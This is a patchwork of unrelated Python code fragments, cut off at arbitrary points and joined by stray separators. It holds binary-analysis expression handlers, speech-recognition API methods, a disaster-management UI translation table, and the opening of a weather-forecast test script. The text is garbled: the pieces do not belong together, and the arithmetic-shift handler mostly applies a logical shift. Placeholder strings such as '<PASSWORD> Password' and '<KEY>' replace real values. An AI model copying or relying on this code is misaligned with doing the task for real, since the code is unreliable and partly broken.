if expr0_v is None and expr1_v is None:
r = MultiValues(offset_to_values={0: {self.state.top(bits)}})
elif expr0_v is None and expr1_v is not None:
# adding a single value to a multivalue
if len(expr0.values) == 1 and 0 in expr0.values:
if all(v.concrete for v in expr0.values[0]):
vs = {v + expr1_v for v in expr0.values[0]}
r = MultiValues(offset_to_values={0: vs})
elif expr0_v is not None and expr1_v is None:
# adding a single value to a multivalue
if len(expr1.values) == 1 and 0 in expr1.values:
if all(v.concrete for v in expr1.values[0]):
vs = {v + expr0_v for v in expr1.values[0]}
r = MultiValues(offset_to_values={0: vs})
else:
# adding two single values together
if expr0_v.concrete and expr1_v.concrete:
r = MultiValues(offset_to_values={0: {expr0_v + expr1_v}})
if r is None:
r = MultiValues(offset_to_values={0: {self.state.top(bits)}})
return r
def _ail_handle_Sub(self, expr: ailment.Expr.BinaryOp) -> MultiValues:
expr0: MultiValues = self._expr(expr.operands[0])
expr1: MultiValues = self._expr(expr.operands[1])
bits = expr.bits
r = None
expr0_v = expr0.one_value()
expr1_v = expr1.one_value()
if expr0_v is None and expr1_v is None:
r = MultiValues(offset_to_values={0: {self.state.top(bits)}})
elif expr0_v is None and expr1_v is not None:
# subtracting a single value from a multivalue
if len(expr0.values) == 1 and 0 in expr0.values:
if all(v.concrete for v in expr0.values[0]):
vs = {v - expr1_v for v in expr0.values[0]}
r = MultiValues(offset_to_values={0: vs})
elif expr0_v is not None and expr1_v is None:
# subtracting a single value from a multivalue
if len(expr1.values) == 1 and 0 in expr1.values:
if all(v.concrete for v in expr1.values[0]):
vs = {expr0_v - v for v in expr1.values[0]}
r = MultiValues(offset_to_values={0: vs})
else:
if expr0_v.concrete and expr1_v.concrete:
r = MultiValues(offset_to_values={0: {expr0_v - expr1_v}})
if r is None:
r = MultiValues(offset_to_values={0: {self.state.top(bits)}})
return r
def _ail_handle_Div(self, expr):
arg0, arg1 = expr.operands
self._expr(arg0)
self._expr(arg1)
bits = expr.bits
r = MultiValues(offset_to_values={0: {self.state.top(bits)}})
return r
def _ail_handle_DivMod(self, expr):
return self._ail_handle_Div(expr)
def _ail_handle_Mul(self, expr):
arg0, arg1 = expr.operands
self._expr(arg0)
self._expr(arg1)
bits = expr.bits
r = MultiValues(offset_to_values={0: {self.state.top(bits)}})
return r
def _ail_handle_Mull(self, expr):
arg0, arg1 = expr.operands
self._expr(arg0)
self._expr(arg1)
bits = expr.bits
r = MultiValues(offset_to_values={0: {self.state.top(bits)}})
return r
def _ail_handle_Shr(self, expr: ailment.Expr.BinaryOp) -> MultiValues:
expr0: MultiValues = self._expr(expr.operands[0])
expr1: MultiValues = self._expr(expr.operands[1])
bits = expr.bits
r = None
expr0_v = expr0.one_value()
expr1_v = expr1.one_value()
if expr0_v is None and expr1_v is None:
r = MultiValues(offset_to_values={0: {self.state.top(bits)}})
elif expr0_v is None and expr1_v is not None:
# each value in expr0 >> expr1_v
if len(expr0.values) == 1 and 0 in expr0.values:
if all(v.concrete for v in expr0.values[0]):
vs = {(claripy.LShR(v, expr1_v._model_concrete.value) if v.concrete else self.state.top(bits))
for v in expr0.values[0]}
r = MultiValues(offset_to_values={0: vs})
elif expr0_v is not None and expr1_v is None:
# expr0_v >> each value in expr1
if len(expr1.values) == 1 and 0 in expr1.values:
if all(v.concrete for v in expr1.values[0]):
vs = {(claripy.LShR(expr0_v, v._model_concrete.value) if v.concrete else self.state.top(bits))
for v in expr1.values[0]}
r = MultiValues(offset_to_values={0: vs})
else:
if expr0_v.concrete and expr1_v.concrete:
r = MultiValues(offset_to_values={0: {claripy.LShR(expr0_v, expr1_v._model_concrete.value)}})
if r is None:
r = MultiValues(offset_to_values={0: {self.state.top(bits)}})
return r
def _ail_handle_Sar(self, expr: ailment.Expr.BinaryOp) -> MultiValues:
expr0: MultiValues = self._expr(expr.operands[0])
expr1: MultiValues = self._expr(expr.operands[1])
bits = expr.bits
r = None
expr0_v = expr0.one_value()
expr1_v = expr1.one_value()
if expr0_v is None and expr1_v is None:
r = MultiValues(offset_to_values={0: {self.state.top(bits)}})
elif expr0_v is None and expr1_v is not None:
# each value in expr0 >> expr1_v
if len(expr0.values) == 1 and 0 in expr0.values:
if all(v.concrete for v in expr0.values[0]):
vs = {(claripy.LShR(v, expr1_v._model_concrete.value) if v.concrete else self.state.top(bits))
for v in expr0.values[0]}
r = MultiValues(offset_to_values={0: vs})
elif expr0_v is not None and expr1_v is None:
# expr0_v >> each value in expr1
if len(expr1.values) == 1 and 0 in expr1.values:
if all(v.concrete for v in expr1.values[0]):
vs = {(claripy.LShR(expr0_v, v._model_concrete.value) if v.concrete else self.state.top(bits))
for v in expr1.values[0]}
r = MultiValues(offset_to_values={0: vs})
else:
if expr0_v.concrete and expr1_v.concrete:
r = MultiValues(offset_to_values={0: {expr0_v >> expr1_v._model_concrete.value}})
if r is None:
r = MultiValues(offset_to_values={0: {self.state.top(bits)}})
return r
def _ail_handle_Shl(self, expr: ailment.Expr.BinaryOp) -> MultiValues:
expr0: MultiValues = self._expr(expr.operands[0])
expr1: MultiValues = self._expr(expr.operands[1])
bits = expr.bits
r = None
expr0_v = expr0.one_value()
expr1_v = expr1.one_value()
if expr0_v is None and expr1_v is None:
r = MultiValues(offset_to_values={0: {self.state.top(bits)}})
elif expr0_v is None and expr1_v is not None:
# each value in expr0 << expr1_v
if len(expr0.values) == 1 and 0 in expr0.values:
if all(v.concrete for v in expr0.values[0]):
vs = {((v << expr1_v._model_concrete.value) if v.concrete else self.state.top(bits))
for v in expr0.values[0]}
r = MultiValues(offset_to_values={0: vs})
elif expr0_v is not None and expr1_v is None:
# expr0_v >> each value in expr1
if len(expr1.values) == 1 and 0 in expr1.values:
if all(v.concrete for v in expr1.values[0]):
vs = {((expr0_v << v._model_concrete.value) if v.concrete else self.state.top(bits))
for v in expr1.values[0]}
r = MultiValues(offset_to_values={0: vs})
else:
if expr0_v.concrete and expr1_v.concrete:
r = MultiValues(offset_to_values={0: {expr0_v << expr1_v._model_concrete.value}})
if r is None:
r = MultiValues(offset_to_values={0: {self.state.top(bits)}})
return r
def _ail_handle_And(self, expr: ailment.Expr.BinaryOp) -> MultiValues:
expr0: MultiValues = self._expr(expr.operands[0])
expr1: MultiValues = self._expr(expr.operands[1])
bits = expr.bits
r = None
expr0_v = expr0.one_value()
expr1_v = expr1.one_value()
if expr0_v is None and expr1_v is None:
r = MultiValues(offset_to_values={0: {self.state.top(bits)}})
return r
if expr0_v is None and expr1_v is not None:
# expr1_v & each value in expr0
if len(expr0.values) == 1 and 0 in expr0.values:
if all(v.concrete for v in expr0.values[0]):
vs = {v & expr1_v for v in expr0.values[0]}
r = MultiValues(offset_to_values={0: vs})
elif expr0_v is not None and expr1_v is None:
# expr0_v & each value in expr1
if len(expr1.values) == 1 and 0 in expr1.values:
if all(v.concrete for v in expr1.values[0]):
vs = {expr0_v & v for v in expr1.values[0]}
r = MultiValues(offset_to_values={0: vs})
else:
# special handling for stack alignment
if | |
thread to repeatedly record phrases from ``source`` (an ``AudioSource`` instance) into an ``AudioData`` instance and call ``callback`` with that ``AudioData`` instance as soon as each phrase are detected.
Returns a function object that, when called, requests that the background listener thread stop, and waits until it does before returning. The background thread is a daemon and will not stop the program from exiting if there are no other non-daemon threads.
Phrase recognition uses the exact same mechanism as ``recognizer_instance.listen(source)``.
The ``callback`` parameter is a function that should accept two parameters - the ``recognizer_instance``, and an ``AudioData`` instance representing the captured audio. Note that ``callback`` function will be called from a non-main thread.
"""
assert isinstance(source, AudioSource), "Source must be an audio source"
running = [True]
def threaded_listen():
with source as s:
while running[0]:
try: # listen for 1 second, then check again if the stop function has been called
audio = self.listen(s, 1)
except TimeoutError: # listening timed out, just try again
pass
else:
if running[0]: callback(self, audio)
def stopper():
running[0] = False
listener_thread.join() # block until the background thread is done, which can be up to 1 second
listener_thread = threading.Thread(target=threaded_listen)
listener_thread.daemon = True
listener_thread.start()
return stopper
def recognize_bing(self, audio_data, key, language = "en-US", show_all = False):
"""
Performs speech recognition on ``audio_data`` (an ``AudioData`` instance), using the Microsoft Bing Voice Recognition API.
The Microsoft Bing Voice Recognition API key is specified by ``key``. Unfortunately, these are not available without `signing up for an account <https://www.microsoft.com/cognitive-services/en-us/speech-api>`__ with Microsoft Cognitive Services.
To get the API key, go to the `Microsoft Cognitive Services subscriptions overview <https://www.microsoft.com/cognitive-services/en-us/subscriptions>`__, go to the entry titled "Speech", and look for the key under the "Keys" column. Microsoft Bing Voice Recognition API keys are 32-character lowercase hexadecimal strings.
The recognition language is determined by ``language``, an RFC5646 language tag like ``"en-US"`` (US English) or ``"fr-FR"`` (International French), defaulting to US English. A list of supported language values can be found in the `API documentation <https://www.microsoft.com/cognitive-services/en-us/speech-api/documentation/api-reference-rest/BingVoiceRecognition#user-content-4-supported-locales>`__.
Returns the most likely transcription if ``show_all`` is false (the default). Otherwise, returns the `raw API response <https://www.microsoft.com/cognitive-services/en-us/speech-api/documentation/api-reference-rest/BingVoiceRecognition#user-content-3-voice-recognition-responses>`__ as a JSON dictionary.
Raises a ``speech_recognition.UnknownValueError`` exception if the speech is unintelligible. Raises a ``speech_recognition.RequestError`` exception if the speech recognition operation failed, if the key isn't valid, or if there is no internet connection.
"""
try: # attempt to use the Python 2 modules
from urllib import urlencode
from urllib2 import Request, urlopen, URLError, HTTPError
except ImportError: # use the Python 3 modules
from urllib.parse import urlencode
from urllib.request import Request, urlopen
from urllib.error import URLError, HTTPError
assert isinstance(audio_data, AudioData), "Data must be audio data"
assert isinstance(key, str), "`key` must be a string"
assert isinstance(language, str), "`language` must be a string"
access_token, expire_time = getattr(self, "bing_cached_access_token", None), getattr(self, "bing_cached_access_token_expiry", None)
allow_caching = True
try:
from time import monotonic # we need monotonic time to avoid being affected by system clock changes, but this is only available in Python 3.3+
except ImportError:
try:
from monotonic import monotonic # use time.monotonic backport for Python 2 if available (from https://pypi.python.org/pypi/monotonic)
except (ImportError, RuntimeError):
expire_time = None # monotonic time not available, don't cache access tokens
allow_caching = False # don't allow caching, since monotonic time isn't available
if expire_time is None or monotonic() > expire_time: # caching not enabled, first credential request, or the access token from the previous one expired
# get an access token using OAuth
credential_url = "https://oxford-speech.cloudapp.net/token/issueToken"
credential_request = Request(credential_url, data = urlencode({
"grant_type": "client_credentials",
"client_id": "python",
"client_secret": key,
"scope": "https://speech.platform.bing.com"
}).encode("utf-8"))
if allow_caching:
start_time = monotonic()
try:
credential_response = urlopen(credential_request)
except HTTPError as e:
raise RequestError("recognition request failed: {0}".format(getattr(e, "reason", "status {0}".format(e.code)))) # use getattr to be compatible with Python 2.6
except URLError as e:
raise RequestError("recognition connection failed: {0}".format(e.reason))
credential_text = credential_response.read().decode("utf-8")
credentials = json.loads(credential_text)
access_token, expiry_seconds = credentials["access_token"], float(credentials["expires_in"])
if allow_caching:
# save the token for the duration it is valid for
self.bing_cached_access_token = access_token
self.bing_cached_access_token_expiry = start_time + expiry_seconds
wav_data = audio_data.get_wav_data(
convert_rate = 16000, # audio samples must be 8kHz or 16 kHz
convert_width = 2 # audio samples should be 16-bit
)
url = "https://speech.platform.bing.com/recognize/query?{0}".format(urlencode({
"version": "3.0",
"requestid": uuid.uuid4(),
"appID": "D4D52672-91D7-4C74-8AD8-42B1D98141A5",
"format": "json",
"locale": language,
"device.os": "wp7",
"scenarios": "ulm",
"instanceid": uuid.uuid4(),
"result.profanitymarkup": "0",
}))
request = Request(url, data = wav_data, headers = {
"Authorization": "Bearer {0}".format(access_token),
"Content-Type": "audio/wav; samplerate=16000; sourcerate={0}; trustsourcerate=true".format(audio_data.sample_rate),
})
try:
response = urlopen(request)
except HTTPError as e:
raise RequestError("recognition request failed: {0}".format(getattr(e, "reason", "status {0}".format(e.code)))) # use getattr to be compatible with Python 2.6
except URLError as e:
raise RequestError("recognition connection failed: {0}".format(e.reason))
response_text = response.read().decode("utf-8")
result = json.loads(response_text)
# return results
if show_all: return result
if "header" not in result or "lexical" not in result["header"]: raise UnknownValueError()
return result["header"]["lexical"]
def recognize_google(self,audio_data, key = None, language = "en-US", show_all = False):
"""
Performs speech recognition on ``audio_data`` (an ``AudioData`` instance), using the Google Speech Recognition API.
The Google Speech Recognition API key is specified by ``key``. If not specified, it uses a generic key that works out of the box. This should generally be used for personal or testing purposes only, as it **may be revoked by Google at any time**.
To obtain your own API key, simply following the steps on the `API Keys <http://www.chromium.org/developers/how-tos/api-keys>`__ page at the Chromium Developers site. In the Google Developers Console, Google Speech Recognition is listed as "Speech API".
The recognition language is determined by ``language``, an RFC5646 language tag like ``"en-US"`` (US English) or ``"fr-FR"`` (International French), defaulting to US English. A list of supported language values can be found in this `StackOverflow answer <http://stackoverflow.com/a/14302134>`__.
Returns the most likely transcription if ``show_all`` is false (the default). Otherwise, returns the raw API response as a JSON dictionary.
Raises a ``speech_recognition.UnknownValueError`` exception if the speech is unintelligible. Raises a ``speech_recognition.RequestError`` exception if the speech recognition operation failed, if the key isn't valid, or if there is no internet connection.
"""
try: # attempt to use the Python 2 modules
from urllib import urlencode
from urllib2 import Request, urlopen, URLError, HTTPError
except ImportError: # use the Python 3 modules
from urllib.parse import urlencode
from urllib.request import Request, urlopen
from urllib.error import URLError, HTTPError
assert isinstance(audio_data, AudioData), "`audio_data` must be audio data"
assert key is None or isinstance(key, str), "`key` must be `None` or a string"
assert isinstance(language, str), "`language` must be a string"
#module uses flac by default, which attempts to open a subprocess which fails on Heroku
#modified this function to use a wav file instead, which Google apparently supports
flac_data = audio_data.get_wav_data(
convert_rate = 16000, # audio samples must be at least 8 kHz
convert_width = 2 # audio samples must be 16-bit
)
#we're using the Google Chromium Speech APIv2 which has been deprecated in favor of the Google Cloud Speech API
#this API is meant for devs, and has a wonky process to enable which involves joining a Google Group
if key is None: key = "<KEY>"
url = "http://www.google.com/speech-api/v2/recognize?{0}".format(urlencode({
"client": "chromium",
"lang": language,
"key": key,
}))
#changed header parameters for wav file
request = Request(url, data = flac_data, headers = {"Content-Type": "audio/l16; rate=16000"})
# obtain audio transcription results
try:
response = urlopen(request)
except HTTPError as e:
raise RequestError("recognition request failed: {0}".format(getattr(e, "reason", "status {0}".format(e.code)))) # use getattr to be compatible with Python 2.6
except URLError as e:
raise RequestError("recognition connection failed: {0}".format(e.reason))
response_text = response.read().decode("utf-8")
#.
# ignore any blank blocks
actual_result = []
for line in response_text.split("\n"):
if not line: continue
result = json.loads(line)["result"]
if len(result) != 0:
actual_result = result[0]
break
# return results
if show_all: return actual_result
if "alternative" not in actual_result: raise UnknownValueError()
for entry in actual_result["alternative"]:
if "transcript" in entry:
return entry["transcript"]
raise UnknownValueError() # no transcriptions available
def recognize_wit(self, audio_data, key, show_all = False):
"""
Performs speech recognition | |
'Candidate Matches for Body %s',
'Canned Fish': 'Canned Fish',
'Cannot be empty': 'Cannot be empty',
'Cannot disable your own account!': 'Cannot disable your own account!',
'Capacity (Max Persons)': 'Capacity (Max Persons)',
'Capture Information on Disaster Victim groups (Tourists, Passengers, Families, etc.)': 'Capture Information on Disaster Victim groups (Tourists, Passengers, Families, etc.)',
'Capture Information on each disaster victim': 'Capture Information on each disaster victim',
'Capturing the projects each organization is providing and where': 'Capturing the projects each organisation is providing and where',
'Cardiology': 'Cardiology',
'Cassava': 'Cassava',
'Casual Labor': 'Casual Labor',
'Casualties': 'Casualties',
'Catalog': 'Catalogue',
'Catalog Details': 'Catalogue Details',
'Catalog Item added': 'Catalogue Item added',
'Catalog Item deleted': 'Catalogue Item deleted',
'Catalog Item updated': 'Catalogue Item updated',
'Catalog Items': 'Catalogue Items',
'Catalog added': 'Catalogue added',
'Catalog deleted': 'Catalogue deleted',
'Catalog updated': 'Catalogue updated',
'Catalogs': 'Catalogues',
'Categories': 'Categories',
'Category': 'Category',
"Caution: doesn't respect the framework rules!": "Caution: doesn't respect the framework rules!",
'Ceilings, light fixtures': 'Ceilings, light fixtures',
'Cell Phone': 'Cell Phone',
'Central point to record details on People': 'Central point to record details on People',
'Certificate': 'Certificate',
'Certificate Catalog': 'Certificate Catalogue',
'Certificate Details': 'Certificate Details',
'Certificate Status': 'Certificate Status',
'Certificate added': 'Certificate added',
'Certificate deleted': 'Certificate deleted',
'Certificate updated': 'Certificate updated',
'Certificates': 'Certificates',
'Certification': 'Certification',
'Certification Details': 'Certification Details',
'Certification added': 'Certification added',
'Certification deleted': 'Certification deleted',
'Certification updated': 'Certification updated',
'Certifications': 'Certifications',
'Certifying Organization': 'Certifying Organisation',
'Change Password': '<PASSWORD> Password',
'Check': 'Check',
'Check Request': 'Check Request',
'Check for errors in the URL, maybe the address was mistyped.': 'Check for errors in the URL, maybe the address was mistyped.',
'Check if the URL is pointing to a directory instead of a webpage.': 'Check if the URL is pointing to a directory instead of a webpage.',
'Check outbox for the message status': 'Check outbox for the message status',
'Check to delete': 'Check to delete',
'Check to delete:': 'Check to delete:',
'Check-in at Facility': 'Check-in at Facility',
'Checked': 'Checked',
'Checklist': 'Checklist',
'Checklist created': 'Checklist created',
'Checklist deleted': 'Checklist deleted',
'Checklist of Operations': 'Checklist of Operations',
'Checklist updated': 'Checklist updated',
'Chemical Hazard': 'Chemical Hazard',
'Chemical, Biological, Radiological, Nuclear or High-Yield Explosive threat or attack': 'Chemical, Biological, Radiological, Nuclear or High-Yield Explosive threat or attack',
'Chicken': 'Chicken',
'Child': 'Child',
'Child (2-11)': 'Child (2-11)',
'Child (< 18 yrs)': 'Child (< 18 yrs)',
'Child Abduction Emergency': 'Child Abduction Emergency',
'Child headed households (<18 yrs)': 'Child headed households (<18 yrs)',
'Children (2-5 years)': 'Children (2-5 years)',
'Children (5-15 years)': 'Children (5-15 years)',
'Children (< 2 years)': 'Children (< 2 years)',
'Children in adult prisons': 'Children in adult prisons',
'Children in boarding schools': 'Children in boarding schools',
'Children in homes for disabled children': 'Children in homes for disabled children',
'Children in juvenile detention': 'Children in juvenile detention',
'Children in orphanages': 'Children in orphanages',
'Children living on their own (without adults)': 'Children living on their own (without adults)',
'Children not enrolled in new school': 'Children not enrolled in new school',
'Children orphaned by the disaster': 'Children orphaned by the disaster',
'Children separated from their parents/caregivers': 'Children separated from their parents/caregivers',
'Children that have been sent to safe places': 'Children that have been sent to safe places',
'Children who have disappeared since the disaster': 'Children who have disappeared since the disaster',
'Chinese (Simplified)': 'Chinese (Simplified)',
'Chinese (Traditional)': 'Chinese (Traditional)',
'Cholera Treatment': 'Cholera Treatment',
'Cholera Treatment Capability': 'Cholera Treatment Capability',
'Cholera Treatment Center': 'Cholera Treatment Center',
'Cholera-Treatment-Center': 'Cholera-Treatment-Center',
'Choose a new posting based on the new evaluation and team judgement. Severe conditions affecting the whole building are grounds for an UNSAFE posting. Localised Severe and overall Moderate conditions may require a RESTRICTED USE. Place INSPECTED placard at main entrance. Post all other placards at every significant entrance.': 'Choose a new posting based on the new evaluation and team judgement. Severe conditions affecting the whole building are grounds for an UNSAFE posting. Localised Severe and overall Moderate conditions may require a RESTRICTED USE. Place INSPECTED placard at main entrance. Post all other placards at every significant entrance.',
'Christian': 'Christian',
'Church': 'Church',
'City': 'City',
'Civil Emergency': 'Civil Emergency',
'Cladding, glazing': 'Cladding, glazing',
'Click on the link': 'Click on the link',
'Client IP': 'Client IP',
'Climate': 'Climate',
'Clinical Laboratory': 'Clinical Laboratory',
'Clinical Operations': 'Clinical Operations',
'Clinical Status': 'Clinical Status',
'Close map': 'Close map',
'Closed': 'Closed',
'Clothing': 'Clothing',
'Cluster': 'Cluster',
'Cluster Details': 'Cluster Details',
'Cluster Distance': 'Cluster Distance',
'Cluster Subsector': 'Cluster Subsector',
'Cluster Subsector Details': 'Cluster Subsector Details',
'Cluster Subsector added': 'Cluster Subsector added',
'Cluster Subsector deleted': 'Cluster Subsector deleted',
'Cluster Subsector updated': 'Cluster Subsector updated',
'Cluster Subsectors': 'Cluster Subsectors',
'Cluster Threshold': 'Cluster Threshold',
'Cluster added': 'Cluster added',
'Cluster deleted': 'Cluster deleted',
'Cluster updated': 'Cluster updated',
'Cluster(s)': 'Cluster(s)',
'Clusters': 'Clusters',
'Code': 'Code',
'Cold Wave': 'Cold Wave',
'Collapse, partial collapse, off foundation': 'Collapse, partial collapse, off foundation',
'Collective center': 'Collective center',
'Color for Underline of Subheadings': 'Colour for Underline of Subheadings',
'Color of Buttons when hovering': 'Colour of Buttons when hovering',
'Color of bottom of Buttons when not pressed': 'Colour of bottom of Buttons when not pressed',
'Color of bottom of Buttons when pressed': 'Colour of bottom of Buttons when pressed',
'Color of dropdown menus': 'Colour of dropdown menus',
'Color of selected Input fields': 'Colour of selected Input fields',
'Color of selected menu items': 'Colour of selected menu items',
'Columns, pilasters, corbels': 'Columns, pilasters, corbels',
'Combined Method': 'Combined Method',
'Come back later.': 'Come back later.',
'Come back later. Everyone visiting this site is probably experiencing the same problem as you.': 'Come back later. Everyone visiting this site is probably experiencing the same problem as you.',
'Comments': 'Comments',
'Commercial/Offices': 'Commercial/Offices',
'Commit': 'Commit',
'Commit Date': 'Commit Date',
'Commit from %s': 'Commit from %s',
'Commit. Status': 'Commit. Status',
'Commiting a changed spreadsheet to the database': 'Commiting a changed spreadsheet to the database',
'Commitment': 'Commitment',
'Commitment Added': 'Commitment Added',
'Commitment Canceled': 'Commitment Canceled',
'Commitment Details': 'Commitment Details',
'Commitment Item Details': 'Commitment Item Details',
'Commitment Item added': 'Commitment Item added',
'Commitment Item deleted': 'Commitment Item deleted',
'Commitment Item updated': 'Commitment Item updated',
'Commitment Items': 'Commitment Items',
'Commitment Status': 'Commitment Status',
'Commitment Updated': 'Commitment Updated',
'Commitments': 'Commitments',
'Committed': 'Committed',
'Committed By': 'Committed By',
'Committed People': 'Committed People',
'Committed Person Details': 'Committed Person Details',
'Committed Person updated': 'Committed Person updated',
'Committing Inventory': 'Committing Inventory',
'Committing Organization': 'Committing Organisation',
'Committing Person': 'Committing Person',
'Communication problems': 'Communication problems',
'Community Centre': 'Community Centre',
'Community Health Center': 'Community Health Center',
'Community Member': 'Community Member',
'Competency': 'Competency',
'Competency Rating Catalog': 'Competency Rating Catalogue',
'Competency Rating Details': 'Competency Rating Details',
'Competency Rating added': 'Competency Rating added',
'Competency Rating deleted': 'Competency Rating deleted',
'Competency Rating updated': 'Competency Rating updated',
'Competency Ratings': 'Competency Ratings',
'Complete': 'Complete',
'Complete a new Assessment': 'Complete a new Assessment',
'Completed': 'Completed',
'Completed Assessment': 'Completed Assessment',
'Completed Assessment Details': 'Completed Assessment Details',
'Completed Assessment added': 'Completed Assessment added',
'Completed Assessment deleted': 'Completed Assessment deleted',
'Completed Assessment updated': 'Completed Assessment updated',
'Completed Assessments': 'Completed Assessments',
'Completed surveys of this Series:': 'Completed surveys of this Series:',
'Complexion': 'Complexion',
'Compose': 'Compose',
'Compromised': 'Compromised',
'Concrete frame': 'Concrete frame',
'Concrete shear wall': 'Concrete shear wall',
'Condition': 'Condition',
'Configuration': 'Configuration',
'Configurations': 'Configurations',
'Configure Run-time Settings': 'Configure Run-time Settings',
'Configure connection details and authentication': 'Configure connection details and authentication',
'Configure resources to synchronize, update methods and policies': 'Configure resources to synchronise, update methods and policies',
'Configure the default proxy server to connect to remote repositories': 'Configure the default proxy server to connect to remote repositories',
'Confirm Shipment Received': 'Confirm Shipment Received',
'Confirmed': 'Confirmed',
'Confirming Organization': 'Confirming Organisation',
'Conflict Policy': 'Conflict Policy',
'Conflict policy': 'Conflict policy',
'Conflicts': 'Conflicts',
'Consignment Note': 'Consignment Note',
'Constraints Only': 'Constraints Only',
'Consumable': 'Consumable',
'Contact': 'Contact',
'Contact Data': 'Contact Data',
'Contact Details': 'Contact Details',
'Contact Info': 'Contact Info',
'Contact Information': 'Contact Information',
'Contact Information Added': 'Contact Information Added',
'Contact Information Deleted': 'Contact Information Deleted',
'Contact Information Updated': 'Contact Information Updated',
'Contact Method': 'Contact Method',
'Contact Name': 'Contact Name',
'Contact Person': 'Contact Person',
'Contact Phone': 'Contact Phone',
'Contact information added': 'Contact information added',
'Contact information deleted': 'Contact information deleted',
'Contact information updated': 'Contact information updated',
'Contact us': 'Contact us',
'Contacts': 'Contacts',
'Contents': 'Contents',
'Contributor': 'Contributor',
'Conversion Tool': 'Conversion Tool',
'Cooking NFIs': 'Cooking NFIs',
'Cooking Oil': 'Cooking Oil',
'Coordinate Conversion': 'Coordinate Conversion',
'Coping Activities': 'Coping Activities',
'Copy': 'Copy',
'Corn': 'Corn',
'Cost Type': 'Cost Type',
'Cost per Megabyte': 'Cost per Megabyte',
'Cost per Minute': 'Cost per Minute',
'Country': 'Country',
'Country is required!': 'Country is required!',
'Country of Residence': 'Country of Residence',
'County': 'County',
'Course': 'Course',
'Course Catalog': 'Course Catalogue',
'Course Certificate Details': 'Course Certificate Details',
'Course Certificate added': 'Course Certificate added',
'Course Certificate deleted': 'Course Certificate deleted',
'Course Certificate updated': 'Course Certificate updated',
'Course Certificates': 'Course Certificates',
'Course Details': 'Course Details',
'Course added': 'Course added',
'Course deleted': 'Course deleted',
'Course updated': 'Course updated',
'Courses': 'Courses',
'Create & manage Distribution groups to receive Alerts': 'Create & manage Distribution groups to receive Alerts',
'Create Checklist': 'Create Checklist',
'Create Group Entry': 'Create Group Entry',
'Create Impact Assessment': 'Create Impact Assessment',
'Create Mobile Impact Assessment': 'Create Mobile Impact Assessment',
'Create New Asset': 'Create New Asset',
'Create New Catalog': 'Create New Catalogue',
'Create New Catalog Item': 'Create New Catalogue Item',
'Create New Event': 'Create New Event',
'Create New Item': 'Create New Item',
'Create New Item Category': 'Create New Item Category',
'Create New Location': 'Create New Location',
'Create New Request': 'Create New Request',
'Create New Scenario': 'Create New Scenario',
'Create New Vehicle': 'Create New Vehicle',
'Create Rapid Assessment': 'Create Rapid Assessment',
'Create Request': | |
<gh_stars>0
##
# This software was developed and / or modified by Raytheon Company,
# pursuant to Contract DG133W-05-CQ-1067 with the US Government.
#
# U.S. EXPORT CONTROLLED TECHNICAL DATA
# This software product contains export-restricted data whose
# export/transfer/disclosure is restricted by U.S. law. Dissemination
# to non-U.S. persons whether in the United States or abroad requires
# an export license or other authorization.
#
# Contractor Name: <NAME>
# Contractor Address: 6825 Pine Street, Suite 340
# Mail Stop B8
# Omaha, NE 68106
# 402.291.0100
#
# See the AWIPS II Master Rights File ("Master Rights File.pdf") for
# further licensing information.
##
# This software is in the public domain, furnished "as is", without technical
# support, and with no warranty, express or implied, as to its usefulness for
# any purpose.
#
# RoutineLevel5_4_TestScript
# Author:
# ----------------------------------------------------------------------------
# Temp phrase
# Sky trends with new Sky categories
addPeriods = """
def _10_503_issuance_list(self, argDict):
seriesDefAM = [
("Period_1", "period1"), #("Phantom", 12),
("Period_2_3", 12), ("Period_2_3", 12),
("Period_4_5", 12), ("Period_4_5", 12),
("Period_6_14", 12), #("Period_6_14", 12), ("Period_6_14", 12), ("Period_6_14", 12),
## ("Period_6_14", 12), ("Period_6_14", 12), ("Period_6_14", 12), ("Period_6_14", 12),
]
seriesDefPM = [
("Period_1", "period1"),
("Period_2_3", 12), ("Period_2_3", 12),
("Period_4_5", 12), ("Period_4_5", 12),
("Period_6_14", 12), ("Period_6_14", 12), ("Period_6_14", 12), ("Period_6_14", 12),
("Period_6_14", 12), ("Period_6_14", 12), ("Period_6_14", 12), ("Period_6_14", 12),
("Period_6_14", 12),
]
return [
("Morning", self.DAY(), self.NIGHT(), self.NIGHT(),
".TODAY...", "early in the morning", "late in the afternoon",
1, seriesDefAM),
("Morning with Pre-1st Period", self.DAY()-2, self.NIGHT(), self.NIGHT(),
".TODAY...", "early in the morning", "late in the afternoon",
1, seriesDefAM),
("Morning Update", "issuanceHour", self.NIGHT(), self.NIGHT(),
".REST OF TODAY...", "early in the morning", "late in the afternoon",
1, seriesDefAM),
("Afternoon Update", "issuanceHour", self.NIGHT(), self.NIGHT(),
".REST OF TODAY...", "early in the morning","late in the afternoon",
1, seriesDefAM),
# End times are tomorrow:
("Afternoon", self.NIGHT(), 24 + self.DAY(), 24 + self.DAY(),
".TONIGHT...", "late in the night", "early in the evening",
1, seriesDefPM),
("Afternoon with Pre-1st Period", self.NIGHT()-2, 24 + self.DAY(), 24 + self.DAY(),
".TONIGHT...", "late in the night", "early in the evening",
1, seriesDefPM),
("Evening Update", "issuanceHour", 24 + self.DAY(), 24 + self.DAY(),
".REST OF TONIGHT...", "early in the morning","early in the evening",
1, seriesDefPM),
# For the early morning update, this produces:
# Rest of Tonight:
# Monday
# Monday Night
("Early Morning Update", "issuanceHour", self.DAY(), self.DAY(),
".REST OF TONIGHT...", "early in the morning","late in the afternoon",
0, seriesDefPM),
# Alternative
# For the early morning update, this produces:
# Early This Morning:
# Today
# Tonight
#("Evening Update", "issuanceHour", 24 + self.DAY(), 24 + self.DAY(),
# ".REST OF TONIGHT...", "late in the night", "early in the evening",
# 1, seriesDefPM),
#("Early Morning Update", "issuanceHour", self.DAY(), self.DAY(),
# ".EARLY THIS MORNING...", "early in the morning", "late in the afternoon",
# 1, seriesDefPM),
]
"""
addTonight = """
def _10_503_issuance_list(self, argDict):
seriesDefAM = [
("Period_1", "period1"), #("Phantom", 12),
("Period_2_3", 12), #("Period_2_3", 12),
## ("Period_4_5", 12), ("Period_4_5", 12),
## ("Period_6_14", 12), #("Period_6_14", 12), ("Period_6_14", 12), ("Period_6_14", 12),
## ("Period_6_14", 12), ("Period_6_14", 12), ("Period_6_14", 12), ("Period_6_14", 12),
]
seriesDefPM = [
("Period_1", "period1"),
("Period_2_3", 12), ("Period_2_3", 12),
("Period_4_5", 12), ("Period_4_5", 12),
("Period_6_14", 12), ("Period_6_14", 12), ("Period_6_14", 12), ("Period_6_14", 12),
("Period_6_14", 12), ("Period_6_14", 12), ("Period_6_14", 12), ("Period_6_14", 12),
